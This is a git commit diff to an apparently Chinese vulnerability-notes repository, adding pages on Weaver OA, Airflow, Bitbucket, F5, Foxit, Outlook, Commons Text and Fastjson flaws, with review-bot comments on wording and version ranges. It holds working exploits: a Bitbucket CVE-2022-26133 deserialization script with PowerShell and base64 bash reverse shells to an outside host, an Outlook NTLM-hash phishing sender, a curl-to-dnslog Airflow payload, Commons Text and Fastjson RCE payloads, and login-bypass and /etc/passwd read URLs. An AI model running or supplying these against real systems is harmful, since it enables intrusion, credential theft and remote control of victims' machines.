Update vulnerabilities

This commit is contained in:
Threekiii 2023-08-03 08:54:06 +08:00
parent 61a7f98a40
commit 8e4f0be1f7
14 changed files with 665 additions and 43 deletions

View File

@ -0,0 +1,29 @@
# 泛微OA E-Cology ofsLogin.jsp 前台任意用户登录漏洞
## 漏洞描述
泛微 e-cology 前台任意用户登录漏洞:泛微 e-cology9 部分版本中存在前台任意用户登录漏洞。该漏洞允许未经身份验证的攻击者通过发送构造的请求触发漏洞,成功利用此漏洞的攻击者可登录任意用户。
## 漏洞影响
```
部分 e-cology9 且补丁版本 < 10.57
```
## 漏洞复现
poc1
```
/mobile/plugin/1/ofsLogin.jsp?syscode=syscode&timestamp=2&gopage=3&receiver=test&loginTokenFromThird=
```
poc2
```
/mobile/plugin/1/ofsLogin.jsp?gopage=/wui/index.html&loginTokenFromThird=866fb3887a60239fc112354ee7ffc168&receiver=1&syscode=1&timestamp
```
## 漏洞修复
目前官方已发布修复建议建议受影响的用户尽快升级至最新版本的补丁。下载地址https://www.weaver.com.cn/cs/securityDownload.asp#
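Review bot: the 漏洞修复 line tells readers to upgrade to the latest patch without naming the threshold, although 漏洞影响 already gives it (补丁版本 < 10.57); say "patch version 10.57 or later" explicitly so an administrator can check an install against it. The same line also needs punctuation: a comma between 修复建议 and 建议, a colon after 下载地址, and the URL ends with a stray #.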

View File

@ -33,8 +33,6 @@ method 为 editrParam。 对 fdParemNames 的内容进行了判空。如果不
将传入进来的 string 字符进行替换。将其载入字节数组缓冲区,在传递给 objectXmlDecoder。 在 objectXmlDecoder 中。就更明显了。典型的 xmlDecoder 反序列化。 整体流程只对 FdParameters 的内容进行了一些内容替换。 导致 xmlDecoder 反序列化漏洞。
其中存在利用 custom.jsp 文件导致前台的命令执行以及文件上传,发送请求执行命令
```
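Review bot: in the first remaining line of this hunk, 在传递给 objectXmlDecoder should read 再传递给 objectXmlDecoder (typo). After the two removed lines the visible text ends with a lone ``` directly after the sentence 发送请求执行命令, so confirm that the request block this sentence introduces still has both an opening and a closing fence in the edited file.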

View File

@ -4,6 +4,7 @@
## 0x01 项目导航
* HW 高危漏洞2021-2023
* 微信小程序反编译
* 蜜罐技术研究与识别
- CMS漏洞
@ -76,11 +77,13 @@
* 禅道 12.4.2 CSRF漏洞 CNVD-2020-68552
* 禅道 12.4.2 后台任意文件上传漏洞 CNVD-C-2020-121325
* 禅道 V16.5 SQL 注入 CNVD-2022-42853
* 禅道 项目管理系统远程命令执行漏洞 CNVD-2023-02709
* 齐博CMS V7 job.php 任意文件读取漏洞
- OA产品漏洞
* O2OA invoke 后台远程命令执行漏洞 CNVD-2020-18740
* O2OA open 后台任意文件读取漏洞
* Untitled
* 一米OA getfile.jsp 任意文件读取漏洞
* 万户OA DocumentEdit.jsp SQL注入漏洞
* 万户OA download_ftp.jsp 任意文件下载漏洞
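Review bot: the new entry * Untitled under OA产品漏洞 reads like an unrenamed file rather than a vulnerability title. Give it the form the rest of the list uses (product, component, vulnerability type, identifier where known), or leave it out of the index until the page has a name.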
@ -112,6 +115,7 @@
* 泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞
* 泛微OA E-cology KtreeUploadAction 任意文件上传
* 泛微OA E-Cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202
* 泛微OA E-Cology ofsLogin.jsp 前台任意用户登录漏洞
* 泛微OA E-Cology users.data 敏感信息泄漏
* 泛微OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞
* 泛微OA E-cology WorkflowServiceXml RCE
@ -134,6 +138,7 @@
* 用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923
* 用友 GRP-U8 UploadFileData 任意文件上传漏洞
* 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
* 用友 NC Cloud 远程代码执行漏洞 CNVD-C-2023-76801
* 用友 NC FileReceiveServlet 反序列化RCE漏洞
* 用友 NC NCFindWeb 任意文件读取漏洞
* 用友 NC XbrlPersistenceServlet反序列化
@ -200,9 +205,12 @@
* Alibaba Canal config 云密钥信息泄露漏洞
* Alibaba Nacos secret.key默认密钥 未授权访问漏洞
* Alibaba Nacos 未授权访问漏洞
* Alibaba Nacos 集群 Raft 反序列化漏洞 CNVD-2023-45001
* Alibaba otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592
* Apache Airflow 远程代码执行漏洞 CVE-2022-40127
* Appspace jsonprequest SSRF漏洞 CVE-2021-27670
* Atlassian Bitbucket archive 远程命令执行漏洞 CVE-2022-36804
* Atlassian Bitbucket Data Center 远程代码执行漏洞 CVE-2022-26133
* Atlassian Bitbucket 登录绕过漏洞
* Atlassian Confluence doenterpagevariables.action 远程命令执行漏洞 CVE-2021-26084
* Atlassian Confluence preview SSTI模版注入漏洞 CVE-2019-3396
@ -300,6 +308,8 @@
* ShowDoc AdminUpdateController.class.php 任意文件上传漏洞 CVE-2021-36440
* ShowDoc PageController.class.php 任意文件上传漏洞
* ShowDoc 前台文件上传漏洞
* Smartbi 登录绕过漏洞
* Smartbi 远程命令执行漏洞
* SolarView Compact 命令注入漏洞 CVE-2022-40881
* SonarQube search_projects 项目信息泄露漏洞
* SonarQube values 信息泄露漏洞 CVE-2020-27986
@ -377,6 +387,8 @@
* 深信服 日志中心 c.php 远程命令执行漏洞
* 深信服 行为感知系统 c.php 远程命令执行漏洞
* 瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞
* 瑞友天翼应用虚拟化系统 AgentBoard.XGI 远程代码执行漏洞
* 用友 畅捷通 T+ 前台远程命令执行漏洞 QVD-2023-13615
* 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
* 用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞
* 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
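Review bot: the added line 瑞友天翼应用虚拟化系统 AgentBoard.XGI 远程代码执行漏洞 writes the vendor name without the space used on the line above it (瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞). Use one spelling so the two entries for the same product sort together and a search for either form finds both.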
@ -401,6 +413,7 @@
* 金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞
* 金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞
* 金笛 短信中间件Web版 log 后台任意文件下载漏洞 CNVD-2021-57336
* 金蝶 K3Cloud BinaryFormatter 反序列化漏洞
* 银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437
* 银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞
* 阿尔法科技 虚拟仿真实验室 未授权访问漏洞
@ -424,6 +437,7 @@
* Apache Druid LoadData 任意文件读取漏洞 CVE-2021-36749
* Apache Druid 远程代码执行漏洞 CVE-2021-25646
* Apache Druid 远程代码执行漏洞 CVE-2021-26919
* Apache Druid 远程代码执行漏洞 QVD-2023-9629
* Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518
* Apache Flink 目录遍历漏洞 CVE-2020-17519
* Apache HTTPd 换行解析漏洞 CVE-2017-15715
@ -438,7 +452,7 @@
* Apache OF Biz RMI Bypass RCE CVE 2021 29200
* Apache OFBiz RMI反序列化漏洞 CVE-2021-26295
* Apache ShenYu dashboardUser 账号密码泄漏漏洞 CVE-2021-37580
* Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933
* Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933
* Apache Shiro 小于1.2.4反序列化漏洞 CVE-2016-4437
* Apache SkyWalking graphql SQL注入漏洞 CVE-2020-9483
* Apache Solr JMX服务 RCE CVE-2019-12409
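Review bot: this 7-line hunk replaces exactly one line, but the old and new lines for Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933 render identically, so the edit is presumably trailing whitespace or an invisible character. The commit message 更新漏洞 gives no hint; either state the intent in the message or drop a whitespace-only change from this commit.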
@ -449,6 +463,7 @@
* Apache Solr stream.url 任意文件读取漏洞
* Apache Solr Velocity模板远程执行 CVE-2019-17558
* Apache Solr XXE 漏洞 CVE-2017-12629
* Apache Solr 代码执行漏洞 CNVD-2023-27598
* Apache Solr 远程执行漏洞 CVE-2019-0193
* Apache Spark create 未授权访问漏洞
* Apache Spark doAs 远程命令执行漏洞 CVE-2022-33891
@ -488,14 +503,18 @@
* K8s etcd未授权访问
- 其他漏洞
* Foxit PDF Reader 及 Editor 任意代码执行漏洞 CVE-2023-27363
* Microsoft Outlook 权限提升漏洞 CVE-2023-23397
* Microsoft Word 远程代码执行漏洞 CVE-2023-21716
* 微信客户端 远程命令执行漏洞
- 开发框架漏洞
* Apache Commons Text 远程代码执行漏洞 CVE-2022-42889
* Apache OFBiz 反序列化 CVE-2021-30128
* Apache OfBiz 服务器端模板注入 SSTI
* Apache OfBiz 远程代码执行 RCE
* FastAdmin 远程代码执行漏洞
* Fastjson 远程代码执行漏洞 CVE-2022-25845
* Jackson Databind SSRF RCE CVE 2020 36179 36182
* Jackson-databind远程代码执行 CVE-2019-12384
* jQuery XSS漏洞 CVE-2020-11022 11023
@ -508,6 +527,8 @@
* Rails sprockets 任意文件读取漏洞 CVE-2018-3760
* Spring Cloud Config 目录遍历漏洞 CVE-2019-3799
* Spring Cloud Function SPEL 远程命令执行漏洞
* Spring Framework 安全绕过漏洞 CVE-2023-20860
* ThinkPHP 命令执行漏洞 CNVD-2022-86535
* XStream SSRF 反序列化漏洞 CVE-2020-26258
* XStream 任意文件删除 反序列化漏洞 CVE-2020-26259
- 开发语言漏洞
@ -533,6 +554,7 @@
- 服务器应用漏洞
* Apache RocketMQ RCE 漏洞 CVE-2023-33246
* Apache RocketMQ 远程代码执行漏洞 CVE-2023-37582
* ClickHouse API 数据库接口未授权访问漏洞
* Consul Docker images 空密码登录漏洞 CVE-2020-29564
* ElasticSearch Groovy 沙盒绕过 & 代码执行漏洞 CVE-2015-1427

View File

@ -0,0 +1,35 @@
# Apache Airflow 远程代码执行漏洞 CVE-2022-40127
## 漏洞描述
Apache Airflow 是一个可编程调度和监控的工作流平台基于有向无环图DAGAirflow 可以定义一组有依赖的任务,按照依赖依次执行。
当攻击者可访问到 Apache Airflow 的后台,且环境中存在默认 Example Dags则可构造恶意请求借助 run_id 执行任意命令。
## 漏洞影响
```
Airflow < 2.4.0
```
## FOFA
```
app="APACHE-Airflow"
```
## 漏洞复现
登录 Airflow在任意 DAG 行,点击 Actions 列的三角符号再点击“Trigger DAG w/ config”。
进入配置,在 Run id (Optional) 处输入 Payload
```
{"lab":"\";curl `uname`.****.dnslog.pw;\""}
```
在 DNSLog 查看回显。
## 修复建议
官方已发布版本 2.4.3,可升级 Apache Airflow 版本到 2.4.0 或以上,或者停用默认 Dags。
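Review bot: the 修复建议 line names 2.4.3 as the released version and then says 2.4.0 或以上; since 漏洞影响 gives the affected range as Airflow < 2.4.0, state 2.4.0 as the threshold and 2.4.3 as the current release, not both as if they were the fix version. 停用默认 Dags should also name the setting: load_examples = False under [core] in airflow.cfg (environment variable AIRFLOW__CORE__LOAD_EXAMPLES), which is what actually removes the precondition the description depends on. In 漏洞描述, 基于有向无环图DAGAirflow 需要 punctuation around DAG (基于有向无环图(DAG)。Airflow 可以...) and a comma before 则可构造.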

View File

@ -0,0 +1,196 @@
# Atlassian Bitbucket Data Center 远程代码执行漏洞 CVE-2022-26133
## 漏洞描述
Atlassian Bitbucket Data Center 存在远程代码执行漏洞。该漏洞是由于Atlassian Bitbucket Data Center 中的 Hazelcast 接口功能未对用户数据进行有效过滤,导致存在反序列化漏洞而引起的。攻击者利用该漏洞可以构造恶意数据远程执行任意代码。只有当 Atlassian Bitbucket Data Center 以 Cluster 模式安装时,才可能受该漏洞影响。
## 漏洞影响
```
Atlassian Bitbucket Data Center >= 5.14.x
Atlassian Bitbucket Data Center 6.x
Atlassian Bitbucket Data Center < 7.6.14
Atlassian Bitbucket Data Center < 7.16.x
Atlassian Bitbucket Data Center < 7.17.6
Atlassian Bitbucket Data Center < 7.18.4
Atlassian Bitbucket Data Center < 7.19.4
Atlassian Bitbucket Data Center 7.20.0
```
## FOFA
```
app="ATLASSIAN-Bitbucket"
```
## 漏洞复现
exp
```
python3 CVE-2022-26133.py -u http://192.168.110.136:7990 -f target.txt
```
```
#!/usr/bin/env python3
## -*- coding: utf_8 -*-
## @Time : 2022/5/7 0007 9:58
from urllib.parse import urlparse
import argparse
import requests
import logging
import socket
import time
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
'''
Atlassian Bitbucket Data Center反序列化漏洞(CVE-2022-26133)
## Windows Reverse Shell(未免杀)
command: powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('192.168.1.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"
## Linux Reverse Shell
command: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}
'''
class CVE_2022_26133:
def __init__(self, target):
parse = urlparse(target)
self.url = parse.scheme + "://" + parse.netloc
self.log_init()
self.timeout = 3
self.proxies = None
## self.proxies = {"http": "http://127.0.0.1:8888", "https": "http://127.0.0.1:8888"}
def log_init(self):
LOG_FORMAT = "%(asctime)s - %(levelname)s - %(message)s"
logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
def str_to_hex(self, param):
ll = []
for i in param:
ll.append(hex(ord(i)).split("x")[1])
return "".join(ll)
def dec_to_hex(self, param, n):
if n == 4:
return '{:04x}'.format(param)
elif n == 8:
return '{:08x}'.format(param)
def get_socket_connect(self):
try:
parse = urlparse(self.url)
target = parse.netloc.split(":")[0]
## default port
port = 5701
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(self.timeout)
sock.connect((target, port))
return sock
except Exception as msg:
logging.critical("target is not reachable, " + str(msg))
def generate_payload(self, cluster, command):
payload = cluster.hex()
payload += "FFFFFF9C"
## yso cb1 payload
payload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
payload += self.dec_to_hex((1684 + len(command)), 8)
payload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
payload += self.dec_to_hex((len(command)), 4)
payload += self.str_to_hex(command)
payload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
## logging.info("payload: " + payload)
return payload
def verify(self, Batch=False):
logging.debug("Checking " + self.url)
try:
sock = self.get_socket_connect()
if sock is not None:
## get ClusterName
data = "000000027361"
sock.send(bytes.fromhex(data))
ClusterName = sock.recv(4) + sock.recv(1024)
sock.close()
if len(ClusterName) != 0:
logging.info("\033[0;36mTarget is vulnerable.\033[0m")
if Batch != False:
with open("success.txt", "a+") as fo:
fo.write(self.url + "\n")
fo.close()
return ClusterName
except Exception as msg:
logging.critical(msg)
def exploit(self, command):
ClusterName = self.verify()
if ClusterName is not None:
try:
sock = self.get_socket_connect()
if sock is not None:
logging.info("command => " + command)
payload = self.generate_payload(ClusterName, command)
sock.send(bytes.fromhex(payload))
time.sleep(0.5)
res = sock.recv(1024)
sock.close()
if len(res) != 0:
logging.info("payload send success, check it.")
except Exception as msg:
if isinstance(msg, ConnectionResetError):
logging.warning("ConnectionResetError: Payload maybe execute successful once target is Linux, Check it.")
else:
logging.critical(msg)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-u', dest='url', help='input target url, eg: http://192.168.1.1:7990/')
parser.add_argument('--verify', action='store_true', default=False, help='verify mode, verify if target is vulnerable.')
parser.add_argument('-c', dest='command', help='exploit mode, eg: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}')
parser.add_argument('-f', dest='file', help='verify targets in the file if vulnerable.')
args = parser.parse_args()
print("""
______ _______ ____ ___ ____ ____ ____ __ _ __________
/ ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ \ / /_ / |___ /___ /
| | \ \ / /| _| _____ __) | | | |__) | __) |____ __) | '_ \| | |_ \ |_ \
| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____/ __/| (_) | |___) |__) |
\____| \_/ |_____| |_____|\___/_____|_____| |_____|\___/|_|____/____/
""")
if args.verify:
CVE_2022_26133(args.url).verify()
elif args.file:
with open(args.file, 'r') as f:
targets = f.readlines()
f.close()
for target in targets:
CVE_2022_26133(target.strip()).verify(True)
elif args.command:
CVE_2022_26133(args.url).exploit(args.command)
```
## 漏洞修复
当前官方已发布最新版本建议受影响的用户及时更新升级到最新版本。链接如下https://www.atlassian.com/software/bitbucket/download-archives
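Review bot: the 漏洞修复 line only says upgrade to the latest version, but the 漏洞影响 list already implies the fixed releases (7.6.14, 7.17.6, 7.18.4, 7.19.4 and the release after 7.20.0); list them. Since the description says only Cluster-mode installs are affected and the script's get_socket_connect targets the Hazelcast port (default port = 5701), add restricting that port to trusted cluster members as a mitigation alongside upgrading. The 漏洞影响 list also mixes lower bounds (>= 5.14.x, 6.x) with upper bounds (< 7.6.14, < 7.17.6, ...) without pairing them into ranges, which reads as if every 6.x release were affected and none fixed; write them as explicit ranges. Finally, the usage line python3 CVE-2022-26133.py -u http://192.168.110.136:7990 -f target.txt does not match the script: with -f given and --verify absent, the elif args.file branch runs and -u is ignored, so document -u together with --verify or -c, and -f on its own.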

View File

@ -35,4 +35,35 @@ Content-Length: 39
{"command":"run","utilCmdArgs":"-c id"}
```
![](./images/202205241449854.png)
![](./images/202205241449854.png)
文件读取:
```
https://your-ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
RCE
```
RCE
```
https://your-ip/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
```
检测脚本https://github.com/jheeree/CVE-2022-1388-checker/blob/main/CVE-2022-1388.sh
使用方法:
```
./CVE-2022-1388.sh hosts.txt
```
## 漏洞修复
建议升级至最新版本或可参考官方修复建议 Recommended Actionshttps://support.f5.com/csp/article/K23605346
在受影响的版本内可执行以下步骤以缓解攻击:
- 通过自身 IP 地址阻止 iControl REST 访问。
- 通过管理界面阻止 iControl REST 访问。
- 修改 BIG-IP httpd 配置。
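Review bot: in the 文件读取 block the label RCE sits inside the fence before the closing ```, so the fenced block contains the fileRead.jsp URL plus a stray word; close the fence right after the fileRead.jsp line (the RCE label that follows outside the fence is the one that belongs). The image ![](./images/202205241449854.png) is inserted twice in a row; keep one. Colons are missing after 检测脚本 and after Recommended Actions before their URLs.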

View File

@ -1,38 +0,0 @@
# KubeOperator kubeconfig 未授权访问漏洞 CVE-2023-22480
## 漏洞描述
KubeOperator 是一个开源的轻量级 Kubernetes 发行版,专注于帮助企业规划、部署和运营生产级别的 Kubernetes 集群。CVE-2023-22480 中由于下载kubeconfig的路径不需要身份认证导致攻击者可直接下载kubeconfig获取相关敏感信息。
## 漏洞影响
KubeOperator < 3.16.4
## FOFA
```
app="KubeOperator"
```
## 漏洞复现
登陆页面
![image-20230504140910659](images/image-20230504140910659.png)
在补丁中修复了配置文件下载接口的未授权
![image-20230504140927095](images/image-20230504140927095.png)
当集群存在时可通过接口未授权下载配置文件
![image-20230504140945600](images/image-20230504140945600.png)
验证POC (k8s为集群名称不固定)
```
/api/v1/clusters/kubeconfig/k8s
```
![image-20230504141007260](images/image-20230504141007260.png)
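Review bot: this hunk deletes the entire KubeOperator kubeconfig 未授权访问漏洞 CVE-2023-22480 page, and the commit message 更新漏洞 does not say whether the content was dropped or moved. If the file was renamed, let the commit show the rename so the README index entry stays valid; if it was dropped, remove its four screenshots under images/ (image-20230504140910659 through image-20230504141007260) in the same commit and say in the message why the entry goes.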

Binary file not shown.


View File

@ -0,0 +1,27 @@
# Foxit PDF Reader 及 Editor 任意代码执行漏洞 CVE-2023-27363
## 漏洞描述
Foxit PDF Reader 及 Editor 中存在任意代码执行漏洞,由于 Foxit PDFReader/Editor 未验证 exportXFAData 方法中的 cPath 参数,使得恶意的.hta 文件写入 Startup 目录中,攻击者可通过诱导受害者打开特制的 PDF 文档触发此漏洞,系统重启后将执行攻击者的恶意代码。
## 漏洞影响
```
Foxit PDF Reader <= 12.1.1.15289
Foxit PDF Editor 12.x <= 12.1.1.15289
Foxit PDF Editor 11.x <= 11.2.5.53785
Foxit PDF Editor <= 10.1.11.37866
```
## 漏洞复现
poc
https://github.com/j00sean/SecBugs/tree/main/CVEs/CVE-2023-27363
## 漏洞修复
目前官方已发布可更新版本,受影响用户可通过以下任一步骤进行更新:
1. 在 Foxit PDF 阅读器或 Foxit PDF 编辑器中,点击“帮助”>“关于 Foxit PDF阅读器”或“关于 Foxit PDF 编辑器”>“检查更新”(对于 10 版本或更早的版本,点击“帮助”>“检查更新”)以更新到最新版本。
2. 手动下载更新https://www.foxit.com/downloads/
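Review bot: the 漏洞修复 section only covers updating, but the 漏洞描述 already gives a concrete detection handle for users who cannot patch immediately: a .hta file being written into the Startup directory by the Foxit reader/editor process while a PDF is open. Add that as a monitoring point next to the update steps. A colon is also missing after 手动下载更新 before the URL.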

View File

@ -0,0 +1,119 @@
# Microsoft Outlook 权限提升漏洞 CVE-2023-23397
## 漏洞描述
该漏洞存在于 Microsoft Outlook 中是一个身份验证绕过漏洞。未经身份验证的远程攻击者仅通过向受影响的系统发送特制电子邮件从而访问用户的Net-NTLMv2 哈希,进而可以在中继攻击中使用此哈希来冒充用户,从而有效地绕过身份验证。
## 漏洞影响
```
Microsoft Outlook 2016 (64-bit edition)
Microsoft Outlook 2013 Service Pack 1 (32-bit editions)
Microsoft Outlook 2013 RT Service Pack 1
Microsoft Outlook 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2019 for 32-bit editions
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft Office 2019 for 64-bit editions
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Outlook 2016 (32-bit edition)
Microsoft Office LTSC 2021 for 32-bit editions
```
## 漏洞复现
exp
```
python CVE-2023-23397.py --path '\\your-ip\'
```
```
import smtplib, datetime, argparse
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
from email.utils import COMMASPACE, formatdate
from independentsoft.msg import Message
## Mail configuration : change it !
smtp_server = "mail.example.com"
smtp_port = 587
sender_email = "attacker@mail.example.com"
sender_password = "P@ssw0rd"
recipients_email = ["victim@mail.example.com"]
class Email:
def __init__(self, smtp_server, port, username, password, recipient):
self.smtp_server = smtp_server
self.port = port
self.username = username
self.password = password
self.recipient = recipient
def send(self, subject, body, attachment_path):
msg = MIMEMultipart()
msg['From'] = self.username
msg['To'] = COMMASPACE.join(self.recipient)
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
msg.attach(MIMEText(body))
with open(attachment_path, 'rb') as f:
part = MIMEApplication(f.read(), Name=attachment_path)
part['Content-Disposition'] = f'attachment; filename="{attachment_path}"'
msg.attach(part)
try:
server = smtplib.SMTP(self.smtp_server, self.port)
server.starttls()
server.login(self.username, self.password)
server.sendmail(self.username, self.recipient, msg.as_string())
server.quit()
print("[+] Malicious appointment sent !")
except Exception as e:
print("[-] Error with SMTP server...", e)
parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.')
parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True)
args = parser.parse_args()
appointment = Message()
appointment.message_class = "IPM.Appointment"
appointment.subject = "CVE-2023-23397"
appointment.body = "New meeting now !"
appointment.location = "Paris"
appointment.appointment_start_time = datetime.datetime.now()
appointment.appointment_end_time = datetime.datetime.now()
appointment.reminder_override_default = True
appointment.reminder_sound_file = args.path
appointment.save("appointment.msg")
email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email)
subject = "Hello There !"
body = "Important appointment !"
email.send(subject, body, "appointment.msg")
```
## 漏洞修复
目前微软官方已针对受支持的产品版本发布了修复该漏洞的安全补丁,建议受影响用户开启系统自动更新安装补丁进行防护。
由于网络问题、计算机环境问题等原因Windows Update 的补丁更新可能出现失败。用户在安装补丁后应及时检查补丁是否成功更新。右键点击Windows 徽标,选择“设置(N)”,选择“更新和安全”-“Windows 更新”,查看该页面上的他提示信息,也可点击“查看更新历史记录”查看历史更新情况。
针对未成功安装更新补丁的情况,可直接下载离线安装包进行更新,链接如下:
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-23397
临时防护措施:
若用户无法正常进行补丁修复,在不影响正常业务的情况下,可使用以下措施对漏洞进行防护:
1. 将用户添加到受保护的用户安全组,以防止使用 NTLM 作为身份验证机制。注意:该操作可能会对需要 NTLM 的应用程序造成一定影响。详情请参考:
https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group
2. 用户可通过在网络中同时使用外围防火墙和本地防火墙,并通过 VPN 设置来阻止 TCP 445/SMB 从网络出站。注意:该操作将禁止发送 NTLM 身份验证消息到远程文件共享。
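Review bot: the script imports from independentsoft.msg import Message, a third-party package, yet the exp section never lists the dependency or an install step; document it. For defenders the script also shows exactly what to look for, which the 临时防护措施 list omits: an IPM.Appointment item whose reminder_sound_file (set from --path '\\your-ip\') points to a UNC path, so add a line about auditing mailbox items with a remote reminder sound path. Typos in the update-check paragraph: 等原因Windows Update needs a comma, and 他提示信息 should read 其他提示信息.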

View File

@ -0,0 +1,72 @@
# Apache Commons Text 远程代码执行漏洞 CVE-2022-42889
## 漏洞描述
Apache Commons Text 项目实现了一系列关于文本字符串的算法专注于处理字符串和文本块。10月13日Apache发布安全公告修复了Apache Commons Text中的一个远程代码执行漏洞CVE-2022-42889。Apache Commons Text版本1.5到1.9中,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。
## 漏洞影响
```
1.5.0 ≤ Apache Commons Text 1.10.0
```
## 环境搭建
IDEA 通过 Maven 导入依赖pox.xml 如下:
```
<dependencies>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-configuration2</artifactId>
<version>2.7</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-text</artifactId>
<version>1.9</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-lang3</artifactId>
<version>3.12.0</version>
</dependency>
</dependencies>
```
测试代码:
```
package org.text;
import org.apache.commons.text.StringSubstitutor;
public class Main {
public static void main(String[] args) {
StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
// String payload = interpolator.replace("${script:js:new
// java.lang.ProcessBuilder(\"calc\").start()}");
String payload = "${script:js:new java.lang.ProcessBuilder(\"calc\").start()}";
interpolator.replace(payload);
}
}
```
## 漏洞复现
Payload
```
search=${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
url编码
search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D
可以尝试
search=${url:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
search=${dns:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
```
## 修复建议
官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。
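Review bot: the 漏洞影响 line 1.5.0 ≤ Apache Commons Text 1.10.0 has lost its upper-bound operator and contradicts the description (versions 1.5 到 1.9); it should read 1.5.0 ≤ Apache Commons Text < 1.10.0, and 修复建议 should name 1.10.0 as the safe version instead of the vague 酌情升级至安全版本. pox.xml in the 环境搭建 line is pom.xml. The test code carries two commented-out lines that duplicate the live payload line; drop them. The test uses the script:js prefix while the 漏洞复现 section uses script:javascript; use one spelling or say that both are accepted.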

View File

@ -0,0 +1,57 @@
# Fastjson 远程代码执行漏洞 CVE-2022-25845
## 漏洞描述
Fastjson 是阿里巴巴的开源 JSON 解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列 化到 JavaBean。在 Fastjson 1.2.80 及以下版本中存在反序列化漏洞,攻击者可 以在特定依赖下利用此漏洞绕过默认 autoType 关闭限制,从而反序列化有安全风险的类。
## 漏洞影响
```
Fastjson ≤ 1.2.80
```
## 漏洞复现
利用 idea 创建 maven 项目 搭建漏洞环境,在 pom 文件中添加
```
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.82</version>
</dependency>
```
创建文件夹 com.example.fastjson在下面添加两个 java 文件
```
package com.example.fastjson;
import java.io.IOException;
public class Poc extends Exception {
public void setName(String str) {
try {
Runtime.getRuntime().exec(str);
} catch (IOException e) {
e.printStackTrace();
}
}
}
package com.example.fastjson;
import com.alibaba.fastjson.JSON;
public class PocDemo {
public static void main(String[] args) {
String json = "{\"@type\":\"java.lang.Exception\",\"@type\":\"com.example.fastjson.Poc\",\"name\":\"calc\"}";
JSON.parse(json);
}
}
```
运行 PocDemo
## 漏洞修复
1. 升级至版本 FastJson 1.2.83https://github.com/alibaba/fastjson/releases/tag/1.2.83
2. 升级到 FastJosn v2https://github.com/alibaba/fastjson2/releases
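Review bot: the reproduction pom pins fastjson 1.2.82 while 漏洞影响 says Fastjson ≤ 1.2.80 and 漏洞修复 says upgrade to 1.2.83; these cannot all be right, so either widen the affected range to cover the version the lab uses or pin a version inside the stated range. The fence after 创建文件夹 com.example.fastjson holds two separate Java files (Poc and PocDemo) with no separator; split them into two blocks and name the files, and add a comma after com.example.fastjson. FastJosn in the last line is Fastjson.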

View File

@ -0,0 +1,29 @@
# ThinkPHP 命令执行漏洞 CNVD-2022-86535
## 漏洞描述
